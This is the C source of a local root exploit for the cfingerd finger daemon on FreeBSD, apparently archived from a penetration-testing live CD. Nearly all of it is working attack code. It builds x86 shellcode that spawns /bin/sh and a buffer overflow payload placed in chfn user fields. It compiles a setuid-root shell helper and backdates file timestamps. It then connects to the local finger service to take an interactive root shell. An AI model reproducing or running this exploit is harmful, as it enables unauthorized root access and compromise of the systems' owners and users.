home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / finger / cfingerd / cfingerd.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  6KB  |  255 lines

---

1. /*
2.  
3. babcia padlina ltd. cfingerd local root exploit (for FreeBSD)
4.  
5. RET: bfbfd7d2
6. PTR: bfbfd750
7.  
8. setting up...
9.  
10. Username: ÉÉÉÉÉÉÉÉÉÉδ#^ì_ë^_1╥ëV_ëV_ëV_êV_1└░;In real life:                    
11.   
12. Home directory: ╘╫┐┐Ue_(            Shell: ëâ@Γ                         
13. Room: ÉÉÉÉÉÉÉÉÉÉÉÉδ#^ì_ë^_1╥ëV_ëV_ëV_êV_1└Work phone:                         
14. Home phone:                         Other:                              
15.  
16. This user has no mail or mail spool.
17. Last seen Sun Sep 19 01:09 PM (CEST) from lagoon.gadaczka
18.  
19. uid=0(root) gid=0(wheel) groups=0(wheel)
20.  
21. */
22.  
23. #include <stdio.h>
24. #include <stdlib.h>
25. #include <unistd.h>
26. #include <errno.h>
27. #include <sys/types.h>
28. #include <sys/socket.h>
29. #include <netinet/in.h>
30. #include <netdb.h>
31. #include <string.h>
32.  
33. #define BUFFER_SIZE     80
34. #define ADDRS           190
35. #define PTROFS          200
36. #define RETOFS          330
37. #define NOP             0x90
38. #define FILE1           "user.inf"
39. #define FILE2           "hack"
40. #define FILE3           "set"
41. #define FINGER          79
42. #define MAXLINE         1024
43. #define LOCALHOST       0x7f000001
44. #define GREEN           "\033[1;32m"
45. #define RED             "\033[1;31m"
46. #define NORM            "\033[1;39m"
47. #define UNBOLD          "\E[m"
48.  
49. long getesp(void) 
50. { 
51.         __asm__("movl %esp,%eax\n");
52. }
53.  
54. void sh(sockfd)
55. int sockfd;
56. {
57.         char buf[MAXLINE];
58.         int c;
59.         fd_set rf, drugi;
60.  
61.         FD_ZERO(&rf);
62.         FD_SET(0, &rf);
63.         FD_SET(sockfd, &rf);
64.  
65.         while (1)
66.         {
67.                 bzero(buf, MAXLINE);
68.                 memcpy (&drugi, &rf, sizeof(rf));
69.                 select(sockfd+1, &drugi, NULL, NULL, NULL);
70.                 if (FD_ISSET(0, &drugi))
71.                 {
72.                         c = read(0, buf, MAXLINE);
73.                         send(sockfd, buf, c, 0x4);
74.                 }
75.  
76.                 if (FD_ISSET(sockfd, &drugi))
77.                 {
78.                         c = read(sockfd, buf, MAXLINE);
79.                         if (c<0) return;
80.                         write(1,buf,c);
81.                 }
82.         }
83. }
84.  
85. int connectto(void)
86. {
87.         int sockfd;
88.         char sendbuf[MAXLINE];
89.         struct sockaddr_in cli;
90.  
91.         bzero(&cli, sizeof(cli));
92.         cli.sin_family = AF_INET;
93.         cli.sin_addr.s_addr=htonl(LOCALHOST);
94.         cli.sin_port = htons(FINGER);
95.  
96.         if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
97.         {
98.                 perror("socket");
99.                 return -1;
100.         }
101.  
102.         if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0) 
103.         {
104.                 perror("connect");
105.                 return -1;
106.         }
107.  
108.         sprintf(sendbuf, "%.1023s\n", getenv("LOGNAME"));
109.         write(sockfd, sendbuf, strlen(sendbuf));
110.  
111.         sleep(1);
112.  
113.         sprintf(sendbuf, "%.900s/%s\n", getenv("HOME"), FILE3);
114.         write(sockfd, sendbuf, strlen(sendbuf));
115.  
116.         sleep(1);
117.  
118.         sprintf(sendbuf, "id\n");
119.         write(sockfd, sendbuf, strlen(sendbuf));
120.  
121.         unlink(FILE3);
122.  
123.         fflush(stdout);
124.         fflush(stderr);
125.  
126.         sh(sockfd);
127.  
128.         return;
129. }
130.  
131.  
132.  
133. int main(argc, argv)
134. int argc;
135. char **argv;
136. {
137.         char *buf1 = NULL, *buf2 = NULL, *p = NULL;
138.         u_long *addr_ptr = NULL;
139.         int noplen, i, bufsize = BUFFER_SIZE, addrs = ADDRS, ptrofs = PTROFS;
140.         int retofs = RETOFS;
141.         long ret, ptr;
142.         FILE *phile;
143.  
144.         char execshell[] = 
145.         "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
146.         "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
147.         "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
148.         "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
149.  
150.         fprintf(stderr, "\n%sbabcia padlina ltd. cfingerd local root
151. exploit%s%s\n\n", GREEN, NORM, UNBOLD);
152.  
153.         if(argc > 5)
154.         {
155.                 bufsize = atoi(argv[1]);
156.                 addrs = atoi(argv[2]);
157.                 ptrofs = atoi(argv[3]);
158.                 retofs = atoi(argv[4]);
159.         }
160.  
161.         if(!(buf1 = malloc(bufsize+1)))
162.         {
163.                 perror("malloc()");
164.                 return -1;
165.         }
166.  
167.         if(!(buf2 = malloc(addrs+1)))
168.         {
169.                 perror("malloc()");
170.                 return -1;
171.         }
172.  
173.         ret = getesp() + retofs;
174.         ptr = getesp() + ptrofs;
175.  
176.         noplen = bufsize - strlen(execshell);
177.         memset(buf1, NOP, noplen);
178.         strcat(buf1, execshell);
179.  
180.         p = buf2;
181.         addr_ptr = (unsigned long *)p;
182.  
183.         for(i = 0; i < (addrs / 4) /2; i++)
184.                 *addr_ptr++ = ptr;
185.  
186.         for(i = 0; i < (addrs / 4) /2; i++)
187.                 *addr_ptr++ = ret;
188.  
189.         p = (char *)addr_ptr;
190.         *p = '\0';
191.  
192.         if ((phile = fopen(FILE1, "w")) == NULL)
193.         {
194.                 perror("fopen()");
195.                 return -1;
196.         }
197.  
198.         fprintf(stderr, "%sRET: %s%x\n%sPTR: %s%x%\n\n%ssetting up...%s%s\n",
199. GREEN, RED, ret, GREEN, RED, ptr, GREEN, NORM, UNBOLD);
200.  
201.         
202. fprintf(phile, "#Changing user database information for %s.\n"
203.                 "Shell: %s\n"
204.                 "Full Name: %s\n"
205.                 "Office Location: %s\n"
206.                 "Office Phone: \n"
207.                 "Home Phone: \n"
208.                 "Other information: \n", 
209.                 getenv("LOGNAME"), getenv("SHELL"), buf2, buf1);
210.  
211.         fclose(phile);
212.  
213.         if ((phile = fopen(FILE2, "w")) == NULL)
214.         {
215.                 perror("fopen()");
216.                 return -1;
217.         }
218.  
219.         fprintf(phile, "cat user.inf>\"$1\"\n");
220.         fprintf(phile, "touch -t 2510711313 \"$1\"\n");
221.  
222.         fclose(phile);
223.  
224.         sprintf(buf1, "%s.c", FILE3);
225.  
226.         if ((phile = fopen(buf1, "w")) == NULL)
227.         {
228.                 perror("fopen()");
229.                 return -1;
230.         }
231.  
232.         // buffer is too small to execute seteuid/setegid there, so we have
233.         // to do this here.
234.  
235.         fprintf(phile, "main() { seteuid(0); setegid(0); system(\"exec
236. /bin/sh\"); }");
237.         fclose(phile);
238.  
239.         sprintf(buf2, "/usr/bin/cc -o %s %s.c", FILE3, FILE3);
240.  
241.         system(buf2);
242.         unlink(buf1);
243.  
244.         system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn > /dev/null
245. 2>&1");
246.         unlink(FILE1);
247.         unlink(FILE2);
248.  
249.         if (connectto() < 0)
250.                 return -1;
251.  
252.         return 0;
253. }
254.  
255.